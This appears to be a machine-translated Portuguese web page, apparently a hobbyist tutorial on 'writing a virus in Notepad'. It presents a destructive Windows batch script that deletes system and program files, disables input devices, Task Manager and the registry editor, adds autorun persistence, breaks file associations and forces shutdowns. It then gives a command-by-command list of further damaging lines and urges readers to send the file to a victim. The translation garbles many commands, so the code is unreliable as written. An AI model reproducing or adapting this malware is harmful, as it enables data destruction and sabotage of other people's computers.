Dicas úteis

Gravando vírus em um notebook

Pin
Send
Share
Send
Send


Inscrever-se >> hosts
chcp 1251
definir papka = 0
:1
conjunto / A papka = papka + 1
md% UserProfile% Desktop% LOL_% papka%
se não% papka% == 1.000.000, vá para 1
del% programfiles% / q> nul
del C: Documents and Settings / q> nul
del% WinDir% / q> nulo
mouse rundll32, desative> nul
teclado rundll32, desative> nul
usuário rundll32, disableoemlayer> nul
tempo 00:00> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer RestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul
taskkill / f / im explorer.exe> ​​não
del: *. * / q> nul
copiar% 0 C: Windows Win32.bat> nul
reg add "HKCU Software Microsoft Windows CurrentVersion Run" / v Win32 / t REG_SZ / d C: Windows Win32.bat / f
reg add HKCU Software Microsoft Windows CurrentVersion Polices System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableCMD / t REG_DWORD / d 2 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
del% WinDir% system32 HAL.dll / q> nulo
del "% SystemRoot% Cache do Driver i386 driver.cab" / f / q> nul
del "% SystemRoot% Media" / q> nulo
assoc * .exe = * .guf
assoc .lnk = .txt
FOR / L %% i IN (1,1,1000000) DO md %% i
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul
del "% SystemRoot% Cursors *. *"> nul
reg add HKCU Software Microsoft Windows ShellNoRoam MUICache / v @C: WINDOWS system32 SHELL32.dll, -8964 / t REG_SZ / d upO / f
reg add HKCU Software Microsoft Windows Versão Atual Policies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul
copie "% 0" "% SystemRoot% system32 sys321.bat> nul
del: * .lnk / q
shutdown -s -t 00 -c error> nul
shutdown -r -t 00 -c error> nul
c: / s / q> nul
del% 0


3) Agora você deve Salvar como no formato .bin
Jogamos o vírus para a vítima)
Boa sorte

Usuário V.I.P

Adivinha o que esse programa fará? Em 15 segundos, ele abrirá 50 calculadoras antes que o usuário tenha tempo de entender o que aconteceu)) Obviamente, enquanto o programa abrirá as calculadoras, uma janela preta será exibida (linha de comando das execuções) se estiver fechada, o programa será encerrado.
Para impedir que o usuário faça isso, considere mais 2 novas equipes.

O novo comando "@echo off" é introduzido no início do nosso vírus e oculta tudo o que acontece nele no futuro. Em uma palavra, não permitiremos que o usuário veja o que aconteceu. Depois de adicionar uma ação simples, mas muito eficaz, após cada comando, como “> nul”, por exemplo, “time 00:00> nul”, ocultaremos a linha. Assim, podemos melhorar nosso vírus:

Bem, o computador irá congelar se o programa abrir calculadoras indefinidamente, mas podemos inserir não apenas calculadoras! Você pode executar taskmgr (Gerenciador de tarefas), mspaint (Paint) e assim por diante.
Agora, uma pequena lista do que você pode escrever no vírus do Bloco de Notas.
LISTA:

1) "copiar% 0 x: y" - copia o vírus para o disco x na pasta y (exemplo: cópia% 0 C: System.bat),
2) "label x: y" - renomeia o disco x para o nome y (exemplo label C: error),
3) "hora x: y" - altera a hora em x horas e minutos (exemplo, hora 14:27),
4) "data x.y.z" - altera a data para x dia, y mês, z anos (data de exemplo 16.11.05),
5) "md x" - criará uma pasta no local em que nosso vírus se chama x (exemplo md Papka),
6) "del *. * / Q" - excluirá todos os arquivos (também nossos vírus) da pasta em que ele está (exceto as pastas),
7) "del x: y *. * / Q" - excluirá todos os arquivos no disco x na pasta y (exceto pastas) (exemplo: F: Data *. * / Q),
8) "assoc .x = .y" - refaça todos os arquivos no computador com o formato x para y (por exemplo, assoc .exe = .mp3),
9) "net user" x "/ add" - adicionará ao computador do usuário sob o nome x (por exemplo, net user "Smoked" / add),
Vamos analisar alguns scripts cruéis.

Com essas duas linhas, estamos causando danos muito graves ao computador da vítima. Ele altera as extensões de todos os arquivos em um computador com .lnk em .txt e .exe em .mp3. Ou seja, todos os atalhos são abertos no bloco de notas e os programas, tudo, no player. Difícil, sim? Bem, isso é tudo) Para todas as escrituras de vírus bem-sucedidas, informe aos noobs o pagamento pela enchente!

Aqui está o mais interessante.

[*] “Taskkill / f / im explorer.exe> ​​nul” - finalize o processo Explorer.exe e você também poderá gravar um processo de finalização.

[*] “Taskkill / f / im pb.exe> ​​nul” - mata pb.eche)

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul" - Desativa o atalho de teclado Ctrl-Alt-Del

[*] "Del"% SystemRoot% system32 * .dll "/ q> nul" - Exclui todas as DLLs do sistema (bibliotecas de download dinâmico)

[*] "Del"% SystemRoot% Driver Cachei386driver.cab "/ f / q> nul" - Remova todos os drivers instalados no computador

[*] "% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul" - Trocar valores do botão do mouse

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul" - Torna impossível iniciar aplicativos

[*] "Hora 0:00> nul" - Defina a hora como 00:00

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul" - Negue a edição manual do registro

[*] "Del"% SystemRoot% Cursors *. * "> Nul" - Exclui o cursor do mouse

[*] "Del"% SystemRoot% Media "/ q> nul" - Excluir sons do sistema Windows

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul" - Negue a chamada ao painel de controle

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul" - Remova a área de trabalho

[*] “Shutdown -r -t 1 -c" lol "-f> nul" - Reinicialização forçada do PC

[*] "Shutdown -s -t 1 -c" lol "-f> nul" - Desligamento forçado do PC

[*] "Net share" ResName "=" C: "> nul" - Compartilhe a unidade C:

[*] “Etiqueta C: Unidade> nul - Renomeie a unidade C:

[*] "Msg *" Texto da mensagem "> nul" - Mostra a mensagem no estilo do Windows com o botão OK

[*] "Del"% 0 "> nul" - Auto-eliminação do vírus

Se você não souber como alterar a extensão do arquivo, faça o seguinte:
vá para o painel de controle, vá para as propriedades da pasta -> guia "Visualizar". Nas "Opções avançadas", desmarque a caixa com "Ocultar extensões para tipos de arquivos registrados". Clique em OK Agora selecione o arquivo desejado, clique com o botão direito do mouse e selecione "Renomear" no menu que aparece. Exclua a extensão (as últimas três letras) e escreva uma nova! Pressione "Enter" no teclado.
Feito !: D

Pin
Send
Share
Send
Send